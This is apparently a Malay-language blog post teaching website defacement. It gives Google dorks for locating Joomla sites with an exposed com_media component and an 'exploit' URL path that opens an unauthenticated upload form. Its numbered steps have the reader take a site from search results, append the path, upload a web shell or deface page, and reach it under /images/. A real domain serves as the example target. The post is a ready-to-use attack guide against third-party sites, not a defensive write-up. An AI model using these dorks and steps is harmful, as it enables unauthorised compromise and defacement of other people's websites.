Dork:
inurl:index.php?option=com_media& site:com
inurl:index2.php?option=com_media& site:net
inurl:option=com_media
Exploit:
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
1. Pilih mana-2 dork di atas kemudian paste di google
2. Pilih salah satu site
3. Contoh site anda adalah :
http://www.smartcarleasing.com/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_sobipro&author=
4. Padam semua selepas nama domain. Dan site itu akan jadi macam ni
http://www.smartcarleasing.com
5. Copy exploit di atas, kemudian paste di belakang URL site. Dan site tersebut akan menjadihttp://www.smartcarleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
6. Jika site itu vulnerable ia seperti gambar di bawah
7. Tekan browse dan pilih shell/deface page anda :)
8. Jika file berjaya diupload, ia akan berada dalam directory /images/
9. Contoh: Click Sini
Thank :)
0 comments:
Post a Comment